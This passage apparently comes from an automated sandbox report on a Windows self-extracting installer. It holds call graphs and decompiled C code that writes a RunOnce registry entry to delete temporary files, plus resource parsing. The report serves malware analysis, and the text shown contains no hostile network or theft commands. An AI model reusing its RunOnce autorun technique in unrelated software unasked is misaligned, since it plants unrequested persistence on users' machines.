a36f2d 3177->3178 3180 a36f02 3177->3180 3179 a36f27 ?terminate@ 3179->3178 3180->3178 3180->3179 3181 a37270 _except_handler4_common 3182 a36c03 3183 a36c17 _exit 3182->3183 3184 a36c1e 3182->3184 3183->3184 3185 a36c27 _cexit 3184->3185 3186 a36c32 3184->3186 3185->3186 3063 a34cc0 GlobalFree 3064 a36f40 SetUnhandledExceptionFilter 3187 a34bc0 3188 a34bd7 3187->3188 3190 a34c05 3187->3190 3189 a34c1b SetFilePointer 3189->3188 3190->3188 3190->3189 3191 a330c0 3192 a330de CallWindowProcA 3191->3192 3193 a330ce 3191->3193 3194 a330da 3192->3194 3193->3192 3193->3194 3195 a363c0 3196 a36407 3195->3196 3197 a3658a CharPrevA 3196->3197 3198 a36415 CreateFileA 3197->3198 3199 a3643a 3198->3199 3200 a36448 WriteFile 3198->3200 3202 a36ce0 4 API calls 3199->3202 3201 a36465 CloseHandle 3200->3201 3201->3199 3204 a3648f 3202->3204 3205 a33100 3206 a33111 3205->3206 3207 a331b0 3205->3207 3209 a3311d 3206->3209 3211 a33149 GetDesktopWindow 3206->3211 3208 a331b9 SendDlgItemMessageA 3207->3208 3210 a33141 3207->3210 3208->3210 3209->3210 3212 a33138 EndDialog 3209->3212 3213 a343d0 11 API calls 3211->3213 3212->3210 3214 a3315d 6 API calls 3213->3214 3214->3210 3215 a34200 3216 a3420b SendMessageA 3215->3216 3217 a3421e 3215->3217 3216->3217 3065 a34cd0 3066 a34cf4 3065->3066 3067 a34d0b 3065->3067 3068 a34b60 FindCloseChangeNotification 3066->3068 3085 a34d02 3066->3085 3070 a34dcb 3067->3070 3073 a34d25 3067->3073 3067->3085 3068->3085 3069 a36ce0 4 API calls 3072 a34e95 3069->3072 3071 a34dd4 SetDlgItemTextA 3070->3071 3074 a34de3 3070->3074 3071->3074 3073->3085 3086 a34c37 3073->3086 3074->3085 3091 a3476d 3074->3091 3077 a34e38 3079 a34980 25 API calls 3077->3079 3077->3085 3081 a34e56 3079->3081 3080 a34b60 FindCloseChangeNotification 3082 a34d99 SetFileAttributesA 3080->3082 3081->3085 3100 a347e0 LocalAlloc 3081->3100 3082->3085 3085->3069 3087 a34c4c DosDateTimeToFileTime 3086->3087 3090 a34c88 3086->3090 3088 a34c5e LocalFileTimeToFileTime 3087->3088 3087->3090 3089 a34c70 SetFileTime 3088->3089 3088->3090 3089->3090 3090->3080 3090->3085 3110 a366ae GetFileAttributesA 3091->3110 3093 a3477b 3093->3077 3094 a347cc SetFileAttributesA 3096 a347db 3094->3096 3096->3077 3097 a36517 24 API calls 3098 a347b1 3097->3098 3098->3094 3098->3096 3099 a347c2 3098->3099 3099->3094 3101 a347f6 3100->3101 3102 a3480f LocalAlloc 3100->3102 3103 a344b9 20 API calls 3101->3103 3106 a34831 3102->3106 3109 a3484f 3102->3109 3104 a3480b 3103->3104 3104->3085 3107 a344b9 20 API calls 3106->3107 3108 a34846 LocalFree 3107->3108 3108->3104 3109->3104 3111 a34777 3110->3111 3111->3093 3111->3094 3111->3097 3112 a34ad0 3120 a33680 3112->3120 3115 a34ae9 3116 a34aee WriteFile 3117 a34b0f 3116->3117 3118 a34b14 3116->3118 3118->3117 3119 a34b3b SendDlgItemMessageA 3118->3119 3119->3117 3121 a33691 MsgWaitForMultipleObjects 3120->3121 3122 a336a9 PeekMessageA 3121->3122 3123 a336e8 3121->3123 3122->3121 3124 a336bc 3122->3124 3123->3115 3123->3116 3124->3121 3124->3123 3125 a336c7 DispatchMessageA 3124->3125 3126 a336d1 PeekMessageA 3124->3126 3125->3126 3126->3124 3218 a33210 3219 a33227 3218->3219 3243 a3328e EndDialog 3218->3243 3220 a333e2 GetDesktopWindow 3219->3220 3221 a33235 3219->3221 3223 a343d0 11 API calls 3220->3223 3224 a33239 3221->3224 3226 a332dd GetDlgItemTextA 3221->3226 3227 a3324c 3221->3227 3225 a333f1 SetWindowTextA SendDlgItemMessageA 3223->3225 3225->3224 3228 a3341f GetDlgItem EnableWindow 3225->3228 3233 a332fc 3226->3233 3250 a33366 3226->3250 3229 a33251 3227->3229 3230 a332c5 EndDialog 3227->3230 3228->3224 3229->3224 3231 a3325c LoadStringA 3229->3231 3230->3224 3234 a33294 3231->3234 3235 a3327b 3231->3235 3232 a344b9 20 API calls 3232->3224 3238 a33331 GetFileAttributesA 3233->3238 3233->3250 3256 a34224 LoadLibraryA 3234->3256 3239 a344b9 20 API calls 3235->3239 3241 a3333f 3238->3241 3242 a3337c 3238->3242 3239->3243 3240 a332a5 SetDlgItemTextA 3240->3224 3240->3235 3245 a344b9 20 API calls 3241->3245 3244 a3658a CharPrevA 3242->3244 3243->3224 3246 a3338d 3244->3246 3247 a33351 3245->3247 3248 a358c8 27 API calls 3246->3248 3247->3224 3249 a3335a CreateDirectoryA 3247->3249 3251 a33394 3248->3251 3249->3242 3249->3250 3250->3232 3251->3250 3252 a333a4 3251->3252 3253 a333c7 EndDialog 3252->3253 3254 a3597d 34 API calls 3252->3254 3253->3224 3255 a333c3 3254->3255 3255->3224 3255->3253 3257 a343b2 3256->3257 3258 a34246 GetProcAddress 3256->3258 3262 a344b9 20 API calls 3257->3262 3259 a343a4 FreeLibrary 3258->3259 3260 a3425d GetProcAddress 3258->3260 3259->3257 3260->3259 3261 a34274 GetProcAddress 3260->3261 3261->3259 3263 a3428b 3261->3263 3264 a3329d 3262->3264 3265 a34295 GetTempPathA 3263->3265 3270 a342e1 3263->3270 3264->3224 3264->3240 3266 a342ad 3265->3266 3266->3266 3267 a342b4 CharPrevA 3266->3267 3268 a342d0 CharPrevA 3267->3268 3267->3270 3268->3270 3269 a34390 FreeLibrary 3269->3264 3270->3269 3271 a34a50 3272 a34a66 3271->3272 3273 a34a9f ReadFile 3271->3273 3274 a34a82 memcpy 3272->3274 3275 a34abb 3272->3275 3273->3275 3274->3275 3276 a33450 3277 a334d3 EndDialog 3276->3277 3278 a3345e 3276->3278 3279 a3346a 3277->3279 3280 a3349a GetDesktopWindow 3278->3280 3284 a33465 3278->3284 3281 a343d0 11 API calls 3280->3281 3282 a334ac SetWindowTextA SetDlgItemTextA SetForegroundWindow 3281->3282 3282->3279 3283 a3348c EndDialog 3283->3279 3284->3279 3284->3283

                                                                        Callgraph

                                                                        • Executed
                                                                        • Not Executed
                                                                        • Opacity -> Relevance
                                                                        • Disassembly available
                                                                        callgraph 0 Function_00A318A3 39 Function_00A36CE0 0->39 51 Function_00A317EE 0->51 1 Function_00A33BA2 15 Function_00A344B9 1->15 17 Function_00A31781 1->17 22 Function_00A36285 1->22 27 Function_00A3468F 1->27 31 Function_00A36495 1->31 1->39 44 Function_00A31AE8 1->44 47 Function_00A33FEF 1->47 74 Function_00A3202A 1->74 101 Function_00A32267 1->101 2 Function_00A372A2 3 Function_00A353A1 21 Function_00A31680 3->21 25 Function_00A3658A 3->25 3->39 94 Function_00A3171E 3->94 4 Function_00A36FA1 5 Function_00A355A0 5->15 5->17 5->22 5->25 5->27 5->39 76 Function_00A32630 5->76 90 Function_00A36517 5->90 100 Function_00A35467 5->100 111 Function_00A3597D 5->111 115 Function_00A36952 5->115 6 Function_00A34CA0 7 Function_00A31EA7 104 Function_00A3256D 7->104 8 Function_00A36FA5 114 Function_00A3724D 8->114 9 Function_00A32CAA 9->0 9->15 9->27 29 Function_00A32390 9->29 34 Function_00A35C9E 9->34 9->39 50 Function_00A336EE 9->50 9->90 10 Function_00A366AE 11 Function_00A32AAC 11->21 11->39 46 Function_00A365E8 11->46 66 Function_00A317C8 11->66 12 Function_00A316B3 12->17 13 Function_00A369B0 16 Function_00A36FBE 13->16 48 Function_00A371EF 13->48 84 Function_00A37000 13->84 108 Function_00A36C70 13->108 14 Function_00A352B6 14->17 14->29 35 Function_00A31FE1 14->35 14->39 14->46 15->21 15->39 63 Function_00A367C9 15->63 92 Function_00A3681F 15->92 15->94 119 Function_00A36F54 16->119 18 Function_00A36380 19 Function_00A33680 20 Function_00A34980 20->15 109 Function_00A3487A 20->109 21->17 23 Function_00A31A84 110 Function_00A3667F 23->110 24 Function_00A3268B 24->15 24->39 24->94 25->12 26 Function_00A32A89 28 Function_00A36793 29->12 29->21 29->25 29->29 29->39 30 Function_00A31F90 30->7 30->15 30->39 31->17 31->25 31->39 32 Function_00A34E99 32->21 33 Function_00A36298 33->39 33->94 34->15 34->21 34->25 38 Function_00A331E0 34->38 34->39 65 Function_00A366C8 34->65 75 Function_00A36E2A 34->75 89 Function_00A35C17 34->89 34->110 36 Function_00A347E0 36->15 36->21 37 Function_00A34FE0 37->15 37->27 58 Function_00A34EFD 37->58 52 Function_00A36CF0 39->52 40 Function_00A324E0 40->25 40->39 41 Function_00A319E0 41->39 69 Function_00A343D0 41->69 42 Function_00A351E5 42->15 42->22 42->27 43 Function_00A370EB 44->11 44->12 44->15 44->17 44->21 44->23 44->25 44->39 44->65 44->94 45 Function_00A328E8 45->26 106 Function_00A32773 45->106 47->15 47->22 47->39 91 Function_00A3411B 47->91 49 Function_00A36BEF 50->15 50->26 50->39 50->45 50->63 50->92 51->39 53 Function_00A334F0 53->15 53->19 53->69 54 Function_00A36EF0 55 Function_00A32BFB 55->9 55->14 55->30 95 Function_00A32F1D 55->95 56 Function_00A366F9 57 Function_00A370FE 58->20 58->39 96 Function_00A34B60 58->96 59 Function_00A34CC0 60 Function_00A34BC0 61 Function_00A330C0 62 Function_00A363C0 62->17 62->25 62->39 63->28 64 Function_00A358C8 64->15 64->21 64->22 64->25 113 Function_00A36648 65->113 67 Function_00A34AD0 67->19 68 Function_00A34CD0 68->20 68->32 68->36 68->39 77 Function_00A34C37 68->77 81 Function_00A34702 68->81 68->96 105 Function_00A3476D 68->105 69->39 70 Function_00A37120 71 Function_00A36A20 72 Function_00A33B26 72->33 72->37 72->90 73 Function_00A34224 73->15 73->21 74->15 74->25 74->39 74->94 75->52 76->15 76->39 78 Function_00A33A3F 78->15 78->22 78->27 78->90 79 Function_00A36C3F 80 Function_00A36C03 80->114 81->12 81->21 82 Function_00A33100 82->69 83 Function_00A34200 85 Function_00A37208 86 Function_00A3490C 87 Function_00A37010 88 Function_00A33210 88->15 88->25 88->64 88->69 88->73 88->111 90->15 91->7 92->39 92->56 93 Function_00A3621E 93->15 93->22 93->39 93->111 95->1 95->5 95->15 95->22 95->25 95->39 95->42 95->72 95->78 95->93 102 Function_00A35164 95->102 103 Function_00A34169 95->103 95->104 97 Function_00A36A60 97->55 97->79 97->85 98 Function_00A37060 97->98 97->114 118 Function_00A37155 97->118 98->70 98->87 99 Function_00A36760 100->3 100->17 100->21 100->22 100->25 100->39 100->64 100->111 101->25 101->39 101->94 102->15 102->27 102->33 103->15 103->27 104->40 105->10 105->90 106->17 106->21 106->25 106->39 107 Function_00A37270 109->86 110->113 111->15 111->22 111->24 111->39 112 Function_00A36F40 116 Function_00A34A50 117 Function_00A33450 117->69 119->85 119->114

                                                                        Control-flow Graph

                                                                        C-Code - Quality: 93%
                                                                        			E00A3202A(struct HINSTANCE__* __edx) {
                                                                        				signed int _v8;
                                                                        				char _v268;
                                                                        				char _v528;
                                                                        				void* _v532;
                                                                        				int _v536;
                                                                        				int _v540;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t28;
                                                                        				long _t36;
                                                                        				long _t41;
                                                                        				struct HINSTANCE__* _t46;
                                                                        				intOrPtr _t49;
                                                                        				intOrPtr _t50;
                                                                        				CHAR* _t54;
                                                                        				void _t56;
                                                                        				signed int _t66;
                                                                        				intOrPtr* _t72;
                                                                        				void* _t73;
                                                                        				void* _t75;
                                                                        				void* _t80;
                                                                        				intOrPtr* _t81;
                                                                        				void* _t86;
                                                                        				void* _t87;
                                                                        				void* _t90;
                                                                        				_Unknown_base(*)()* _t91;
                                                                        				signed int _t93;
                                                                        				void* _t94;
                                                                        				void* _t95;
                                                                        
                                                                        				_t79 = __edx;
                                                                        				_t28 =  *0xa38004; // 0xb6b6972c
                                                                        				_v8 = _t28 ^ _t93;
                                                                        				_t84 = 0x104;
                                                                        				memset( &_v268, 0, 0x104);
                                                                        				memset( &_v528, 0, 0x104);
                                                                        				_t95 = _t94 + 0x18;
                                                                        				_t66 = 0;
                                                                        				_t36 = RegCreateKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0, 0, 0x2001f, 0,  &_v532,  &_v536); // executed
                                                                        				if(_t36 != 0) {
                                                                        					L24:
                                                                        					return E00A36CE0(_t36, _t66, _v8 ^ _t93, _t79, _t84, _t86);
                                                                        				}
                                                                        				_push(_t86);
                                                                        				_t87 = 0;
                                                                        				while(1) {
                                                                        					E00A3171E("wextract_cleanup0", 0x50, "wextract_cleanup%d", _t87);
                                                                        					_t95 = _t95 + 0x10;
                                                                        					_t41 = RegQueryValueExA(_v532, "wextract_cleanup0", 0, 0, 0,  &_v540); // executed
                                                                        					if(_t41 != 0) {
                                                                        						break;
                                                                        					}
                                                                        					_t87 = _t87 + 1;
                                                                        					if(_t87 < 0xc8) {
                                                                        						continue;
                                                                        					}
                                                                        					break;
                                                                        				}
                                                                        				if(_t87 != 0xc8) {
                                                                        					GetSystemDirectoryA( &_v528, _t84);
                                                                        					_t79 = _t84;
                                                                        					E00A3658A( &_v528, _t84, "advpack.dll");
                                                                        					_t46 = LoadLibraryA( &_v528); // executed
                                                                        					_t84 = _t46;
                                                                        					if(_t84 == 0) {
                                                                        						L10:
                                                                        						if(GetModuleFileNameA( *0xa39a3c,  &_v268, 0x104) == 0) {
                                                                        							L17:
                                                                        							_t36 = RegCloseKey(_v532);
                                                                        							L23:
                                                                        							_pop(_t86);
                                                                        							goto L24;
                                                                        						}
                                                                        						L11:
                                                                        						_t72 =  &_v268;
                                                                        						_t80 = _t72 + 1;
                                                                        						do {
                                                                        							_t49 =  *_t72;
                                                                        							_t72 = _t72 + 1;
                                                                        						} while (_t49 != 0);
                                                                        						_t73 = _t72 - _t80;
                                                                        						_t81 = 0xa391e4;
                                                                        						do {
                                                                        							_t50 =  *_t81;
                                                                        							_t81 = _t81 + 1;
                                                                        						} while (_t50 != 0);
                                                                        						_t84 = _t73 + 0x50 + _t81 - 0xa391e5;
                                                                        						_t90 = LocalAlloc(0x40, _t73 + 0x50 + _t81 - 0xa391e5);
                                                                        						if(_t90 != 0) {
                                                                        							 *0xa38580 = _t66 ^ 0x00000001;
                                                                        							_t54 = "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"";
                                                                        							if(_t66 == 0) {
                                                                        								_t54 = "%s /D:%s";
                                                                        							}
                                                                        							_push("C:\Users\FRONTD~1\AppData\Local\Temp\IXP000.TMP\");
                                                                        							E00A3171E(_t90, _t84, _t54,  &_v268);
                                                                        							_t75 = _t90;
                                                                        							_t23 = _t75 + 1; // 0x1
                                                                        							_t79 = _t23;
                                                                        							do {
                                                                        								_t56 =  *_t75;
                                                                        								_t75 = _t75 + 1;
                                                                        							} while (_t56 != 0);
                                                                        							_t24 = _t75 - _t79 + 1; // 0x2
                                                                        							RegSetValueExA(_v532, "wextract_cleanup0", 0, 1, _t90, _t24); // executed
                                                                        							RegCloseKey(_v532); // executed
                                                                        							_t36 = LocalFree(_t90);
                                                                        							goto L23;
                                                                        						}
                                                                        						_t79 = 0x4b5;
                                                                        						E00A344B9(0, 0x4b5, _t51, _t51, 0x10, _t51);
                                                                        						goto L17;
                                                                        					}
                                                                        					_t91 = GetProcAddress(_t84, "DelNodeRunDLL32");
                                                                        					_t66 = 0 | _t91 != 0x00000000;
                                                                        					FreeLibrary(_t84); // executed
                                                                        					if(_t91 == 0) {
                                                                        						goto L10;
                                                                        					}
                                                                        					if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
                                                                        						E00A3658A( &_v268, 0x104, 0xa31140);
                                                                        					}
                                                                        					goto L11;
                                                                        				}
                                                                        				_t36 = RegCloseKey(_v532);
                                                                        				 *0xa38530 = _t66;
                                                                        				goto L23;
                                                                        			}

































                                                                        0x00a3202a
                                                                        0x00a32035
                                                                        0x00a3203c
                                                                        0x00a32041
                                                                        0x00a32050
                                                                        0x00a3205f
                                                                        0x00a32064
                                                                        0x00a3206f
                                                                        0x00a3208c
                                                                        0x00a32094
                                                                        0x00a32257
                                                                        0x00a32266
                                                                        0x00a32266
                                                                        0x00a3209a
                                                                        0x00a3209b
                                                                        0x00a3209d
                                                                        0x00a320aa
                                                                        0x00a320af
                                                                        0x00a320c9
                                                                        0x00a320d1
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00a320d3
                                                                        0x00a320da
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00a320da
                                                                        0x00a320e2
                                                                        0x00a32103
                                                                        0x00a3210e
                                                                        0x00a32116
                                                                        0x00a32122
                                                                        0x00a32128
                                                                        0x00a3212c
                                                                        0x00a32179
                                                                        0x00a32194
                                                                        0x00a321de
                                                                        0x00a321e4
                                                                        0x00a32256
                                                                        0x00a32256
                                                                        0x00000000
                                                                        0x00a32256
                                                                        0x00a32196
                                                                        0x00a32196
                                                                        0x00a3219c
                                                                        0x00a3219f
                                                                        0x00a3219f
                                                                        0x00a321a1
                                                                        0x00a321a2
                                                                        0x00a321a6
                                                                        0x00a321a8
                                                                        0x00a321b0
                                                                        0x00a321b0
                                                                        0x00a321b2
                                                                        0x00a321b3
                                                                        0x00a321bc
                                                                        0x00a321c7
                                                                        0x00a321cb
                                                                        0x00a321f1
                                                                        0x00a321f6
                                                                        0x00a321fd
                                                                        0x00a321ff
                                                                        0x00a321ff
                                                                        0x00a32204
                                                                        0x00a32213
                                                                        0x00a32218
                                                                        0x00a3221d
                                                                        0x00a3221d
                                                                        0x00a32220
                                                                        0x00a32220
                                                                        0x00a32222
                                                                        0x00a32223
                                                                        0x00a32229
                                                                        0x00a3223d
                                                                        0x00a32249
                                                                        0x00a32250
                                                                        0x00000000
                                                                        0x00a32250
                                                                        0x00a321d2
                                                                        0x00a321d9
                                                                        0x00000000
                                                                        0x00a321d9
                                                                        0x00a3213a
                                                                        0x00a32141
                                                                        0x00a32144
                                                                        0x00a3214c
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00a32163
                                                                        0x00a32172
                                                                        0x00a32172
                                                                        0x00000000
                                                                        0x00a32163
                                                                        0x00a320ea
                                                                        0x00a320f0
                                                                        0x00000000

                                                                        APIs
                                                                        • memset.MSVCRT ref: 00A32050
                                                                        • memset.MSVCRT ref: 00A3205F
                                                                        • RegCreateKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00000000,00000000,0002001F,00000000,?,?,?,?,?,?,00000000,00000000), ref: 00A3208C
                                                                          • Part of subcall function 00A3171E: _vsnprintf.MSVCRT ref: 00A31750
                                                                        • RegQueryValueExA.KERNELBASE(?,wextract_cleanup0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00A320C9
                                                                        • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00A320EA
                                                                        • GetSystemDirectoryA.KERNEL32 ref: 00A32103
                                                                        • LoadLibraryA.KERNELBASE(?,advpack.dll,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00A32122
                                                                        • GetProcAddress.KERNEL32(00000000,DelNodeRunDLL32), ref: 00A32134
                                                                        • FreeLibrary.KERNELBASE(00000000,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00A32144
                                                                        • GetSystemDirectoryA.KERNEL32 ref: 00A3215B
                                                                        • GetModuleFileNameA.KERNEL32(?,00000104,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00A3218C
                                                                        • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00A321C1
                                                                        • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00A321E4
                                                                        • RegSetValueExA.KERNELBASE(?,wextract_cleanup0,00000000,00000001,00000000,00000002,?,?,?,?,?,?,?,?,?), ref: 00A3223D
                                                                        • RegCloseKey.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00A32249
                                                                        • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00A32250
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.396615809.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                        • Associated: 00000000.00000002.396538956.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396668507.0000000000A38000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                                                        Similarity
                                                                        • API ID: Close$DirectoryFreeLibraryLocalSystemValuememset$AddressAllocCreateFileLoadModuleNameProcQuery_vsnprintf
                                                                        • String ID: %s /D:%s$C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\$DelNodeRunDLL32$Software\Microsoft\Windows\CurrentVersion\RunOnce$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup%d$wextract_cleanup0
                                                                        • API String ID: 178549006-2414900631
                                                                        • Opcode ID: 47e9ff77f8d10c2c1a66c679e2aa07ffb263ee93ec679ef7f854aea12a86e221
                                                                        • Instruction ID: efb5d68d83f380ee88cb41f853b1bd9bbfbd564ceaa62c2b4791be0f988f471c
                                                                        • Opcode Fuzzy Hash: 47e9ff77f8d10c2c1a66c679e2aa07ffb263ee93ec679ef7f854aea12a86e221
                                                                        • Instruction Fuzzy Hash: 8051F771A00224BBDB24DBA4DC49FFB777CEF55700F0042A8F985E7151DAB59E4A8B60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 36 a33ba2-a33bd9 37 a33bdb-a33bee call a3468f 36->37 38 a33bfd-a33bff 36->38 45 a33d13-a33d30 call a344b9 37->45 46 a33bf4-a33bf7 37->46 40 a33c03-a33c28 memset 38->40 42 a33d35-a33d48 call a31781 40->42 43 a33c2e-a33c40 call a3468f 40->43 50 a33d4d-a33d52 42->50 43->45 51 a33c46-a33c49 43->51 58 a33f4d 45->58 46->38 46->45 53 a33d54-a33d6c call a3468f 50->53 54 a33d9e-a33db6 call a31ae8 50->54 51->45 56 a33c4f-a33c56 51->56 53->45 65 a33d6e-a33d75 53->65 54->58 69 a33dbc-a33dc2 54->69 60 a33c60-a33c65 56->60 61 a33c58-a33c5e 56->61 63 a33f4f-a33f63 call a36ce0 58->63 67 a33c67-a33c6d 60->67 68 a33c75-a33c7c 60->68 66 a33c6e-a33c73 61->66 71 a33d7b-a33d98 CompareStringA 65->71 72 a33fda-a33fe1 65->72 73 a33c87-a33c89 66->73 67->66 68->73 76 a33c7e-a33c82 68->76 74 a33de6-a33de8 69->74 75 a33dc4-a33dce 69->75 71->54 71->72 77 a33fe3 call a32267 72->77 78 a33fe8-a33fea 72->78 73->50 80 a33c8f-a33c98 73->80 81 a33f0b-a33f15 call a33fef 74->81 82 a33dee-a33df5 74->82 75->74 79 a33dd0-a33dd7 75->79 76->73 77->78 78->63 79->74 85 a33dd9-a33ddb 79->85 86 a33cf1-a33cf3 80->86 87 a33c9a-a33c9c 80->87 92 a33f1a-a33f1c 81->92 88 a33fab-a33fd2 call a344b9 LocalFree 82->88 89 a33dfb-a33dfd 82->89 85->82 93 a33ddd-a33de1 call a3202a 85->93 86->54 91 a33cf9-a33d11 call a3468f 86->91 95 a33ca5-a33ca7 87->95 96 a33c9e-a33ca3 87->96 88->58 89->81 90 a33e03-a33e0a 89->90 90->81 97 a33e10-a33e19 call a36495 90->97 91->45 91->50 99 a33f46-a33f47 LocalFree 92->99 100 a33f1e-a33f2d LocalFree 92->100 93->74 95->58 104 a33cad 95->104 103 a33cb2-a33cc5 call a3468f 96->103 113 a33f92-a33fa9 call a344b9 97->113 114 a33e1f-a33e36 GetProcAddress 97->114 99->58 108 a33f33-a33f3b 100->108 109 a33fd7-a33fd9 100->109 103->45 112 a33cc7-a33ce8 CompareStringA 103->112 104->103 108->40 109->72 112->86 115 a33cea-a33ced 112->115 126 a33f7c-a33f90 LocalFree call a36285 113->126 116 a33f64-a33f76 call a344b9 FreeLibrary 114->116 117 a33e3c-a33e80 114->117 115->86 116->126 120 a33e82-a33e87 117->120 121 a33e8b-a33e94 117->121 120->121 124 a33e96-a33e9b 121->124 125 a33e9f-a33ea2 121->125 124->125 128 a33ea4-a33ea9 125->128 129 a33ead-a33eb6 125->129 126->58 128->129 131 a33ec1-a33ec3 129->131 132 a33eb8-a33ebd 129->132 133 a33ec5-a33eca 131->133 134 a33ece-a33eec 131->134 132->131 133->134 137 a33ef5-a33efd 134->137 138 a33eee-a33ef3 134->138 139 a33f40 FreeLibrary 137->139 140 a33eff-a33f09 FreeLibrary 137->140 138->137 139->99 140->100
                                                                        C-Code - Quality: 82%
                                                                        			E00A33BA2() {
                                                                        				signed int _v8;
                                                                        				signed int _v12;
                                                                        				char _v276;
                                                                        				char _v280;
                                                                        				short _v300;
                                                                        				intOrPtr _v304;
                                                                        				void _v348;
                                                                        				char _v352;
                                                                        				intOrPtr _v356;
                                                                        				signed int _v360;
                                                                        				short _v364;
                                                                        				char* _v368;
                                                                        				intOrPtr _v372;
                                                                        				void* _v376;
                                                                        				intOrPtr _v380;
                                                                        				char _v384;
                                                                        				signed int _v388;
                                                                        				intOrPtr _v392;
                                                                        				signed int _v396;
                                                                        				signed int _v400;
                                                                        				signed int _v404;
                                                                        				void* _v408;
                                                                        				void* _v424;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t69;
                                                                        				signed int _t76;
                                                                        				void* _t77;
                                                                        				signed int _t79;
                                                                        				short _t96;
                                                                        				signed int _t97;
                                                                        				intOrPtr _t98;
                                                                        				signed int _t101;
                                                                        				signed int _t104;
                                                                        				signed int _t108;
                                                                        				int _t112;
                                                                        				void* _t115;
                                                                        				signed char _t118;
                                                                        				void* _t125;
                                                                        				signed int _t127;
                                                                        				void* _t128;
                                                                        				struct HINSTANCE__* _t129;
                                                                        				void* _t130;
                                                                        				short _t137;
                                                                        				char* _t140;
                                                                        				signed char _t144;
                                                                        				signed char _t145;
                                                                        				signed int _t149;
                                                                        				void* _t150;
                                                                        				void* _t151;
                                                                        				signed int _t153;
                                                                        				void* _t155;
                                                                        				void* _t156;
                                                                        				signed int _t157;
                                                                        				signed int _t162;
                                                                        				signed int _t164;
                                                                        				void* _t165;
                                                                        
                                                                        				_t164 = (_t162 & 0xfffffff8) - 0x194;
                                                                        				_t69 =  *0xa38004; // 0xb6b6972c
                                                                        				_v8 = _t69 ^ _t164;
                                                                        				_t153 = 0;
                                                                        				 *0xa39124 =  *0xa39124 & 0;
                                                                        				_t149 = 0;
                                                                        				_v388 = 0;
                                                                        				_v384 = 0;
                                                                        				_t165 =  *0xa38a28 - _t153; // 0x0
                                                                        				if(_t165 != 0) {
                                                                        					L3:
                                                                        					_t127 = 0;
                                                                        					_v392 = 0;
                                                                        					while(1) {
                                                                        						_v400 = _v400 & 0x00000000;
                                                                        						memset( &_v348, 0, 0x44);
                                                                        						_t164 = _t164 + 0xc;
                                                                        						_v348 = 0x44;
                                                                        						if( *0xa38c42 != 0) {
                                                                        							goto L26;
                                                                        						}
                                                                        						_t146 =  &_v396;
                                                                        						_t115 = E00A3468F("SHOWWINDOW",  &_v396, 4);
                                                                        						if(_t115 == 0 || _t115 > 4) {
                                                                        							L25:
                                                                        							_t146 = 0x4b1;
                                                                        							E00A344B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                        							 *0xa39124 = 0x80070714;
                                                                        							goto L62;
                                                                        						} else {
                                                                        							if(_v396 != 1) {
                                                                        								__eflags = _v396 - 2;
                                                                        								if(_v396 != 2) {
                                                                        									_t137 = 3;
                                                                        									__eflags = _v396 - _t137;
                                                                        									if(_v396 == _t137) {
                                                                        										_v304 = 1;
                                                                        										_v300 = _t137;
                                                                        									}
                                                                        									goto L14;
                                                                        								}
                                                                        								_push(6);
                                                                        								_v304 = 1;
                                                                        								_pop(0);
                                                                        								goto L11;
                                                                        							} else {
                                                                        								_v304 = 1;
                                                                        								L11:
                                                                        								_v300 = 0;
                                                                        								L14:
                                                                        								if(_t127 != 0) {
                                                                        									L27:
                                                                        									_t155 = 1;
                                                                        									__eflags = _t127 - 1;
                                                                        									if(_t127 != 1) {
                                                                        										L31:
                                                                        										_t132 =  &_v280;
                                                                        										_t76 = E00A31AE8( &_v280,  &_v408,  &_v404); // executed
                                                                        										__eflags = _t76;
                                                                        										if(_t76 == 0) {
                                                                        											L62:
                                                                        											_t77 = 0;
                                                                        											L63:
                                                                        											_pop(_t150);
                                                                        											_pop(_t156);
                                                                        											_pop(_t128);
                                                                        											return E00A36CE0(_t77, _t128, _v12 ^ _t164, _t146, _t150, _t156);
                                                                        										}
                                                                        										_t157 = _v404;
                                                                        										__eflags = _t149;
                                                                        										if(_t149 != 0) {
                                                                        											L37:
                                                                        											__eflags = _t157;
                                                                        											if(_t157 == 0) {
                                                                        												L57:
                                                                        												_t151 = _v408;
                                                                        												_t146 =  &_v352;
                                                                        												_t130 = _t151; // executed
                                                                        												_t79 = E00A33FEF(_t130,  &_v352); // executed
                                                                        												__eflags = _t79;
